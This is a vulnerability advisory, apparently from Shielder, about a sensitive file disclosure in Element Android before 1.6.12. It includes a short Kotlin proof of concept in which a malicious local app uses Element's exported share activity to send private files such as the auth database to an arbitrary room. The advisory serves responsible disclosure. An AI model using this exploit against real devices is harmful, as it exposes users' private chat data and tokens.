Element Android (<1.6.12) Sensitive file disclosure via share activity

Summary

Element Android (<1.6.12) is affected by a sensitive file disclosure, allowing a third-party malicious application to force sharing files stored under the files directory in the application’s private sandboxed data directory to an arbitrary room. Sensitive files include the encrypted chat database, the FCM tokens, etc.

Product Description (from vendor)

“Element is the flagship secure collaboration app for the decentralized Matrix communication network. Element lets you own your own end-to-end encrypted chat server, while still connecting to everyone else in the wider Matrix network.”. For more information visit https://element.io/.

CVE(s)

Details

Root Cause Analysis

The Element Android application exposes an activity to share files from other applications towards arbitrary chats/rooms (e.g. share a photo from gallery into a room).

These files are shared via a Content Provider named MultiPickerFileProvider that exposes, under the external_files definition, all the files contained in the application sandbox pointing to /data/data/im.vector.app/files.

Specifically, in the intent handler, the execution reaches the getIncomingFiles in library/multipicker/src/main/java/im/vector/lib/multipicker/Picker.kt, where the URI EXTRA_STREAM is resolved by the content provider.

Proof of Concept

To reproduce the vulnerability, it is needed to develop and install an application on a device where Element Android is installed.

  1. Create a new app on Android Studio, using the Kotlin language.
  2. Inside the OnCreate function of the MainActivity class, add the following content:
1
2
3
4
5
6
7
val share = Intent()
share.setClassName("im.vector.app", "im.vector.app.features.share.IncomingShareActivity")
share.action = "android.intent.action.SEND"
share.putExtra(Intent.EXTRA_STREAM, Uri.parse("content://im.vector.app.multipicker.fileprovider/external_files/matrix-sdk-auth.realm"))
share.putExtra(Intent.EXTRA_SHORTCUT_ID, $ROOM_ID)
share.type = "application/octet-stream"
startActivity(share)
  1. Replace the $ROOM_ID placeholder with the ID of a room both the attacker and the victim are participants of (it could be one of the most used public rooms).
  2. Launch the application.
  3. Notice that the file matrix-sdk-global.realm was sent to the chosen room.

Impact

A local malicious application can invoke the IncomingShareActivity, which is exported, setting a content URI pointing to a private file, forcing sharing it to an arbitrary room. Moreover, by setting the EXTRA_SHORTCUT_ID extra, the application can force Element an arbitrary the room to which the file will be shared, in a way that does not require any interaction from the user.

Therefore, an attacker who can install a malicious app on the victim’s device might force the Element Android application to share private files to arbitrary rooms.

The attack however requires a malicious app installed on the victim’s device.

Remediation

Upgrade to Element 1.6.12 or later.

Disclosure Timeline

This report was subject to Shielder’s disclosure policy and Element’s disclosure policy:

  • 01/02/2024:
    • First contact with Element Security Team.
  • 06/02/2024:
    • Element Security Team acknowledges the vulnerability and starts working on a fix.
    • Element Security Team proposes a grace-period before publishing full details of the findings.
    • Shielder agrees on the grace-period since many users are affected.
  • 19/02/2024:
    • Element Security Team informs Shielder about the fixes and communicates that a release and a brief blogpost are due the day after.
  • 20/02/2024:
    • Element 1.6.12 is released and a blogpost about the impact of the findings is published, along with CVE numbers and Github advisories.
  • 09/04/2024:
    • Shielder releases a full blogpost.
    • Shielder’s advisory is made public.

Credits

This advisory was first published on https://www.shielder.com/advisories/element-android-sensitive-file-disclosure/

Date

18 April 2024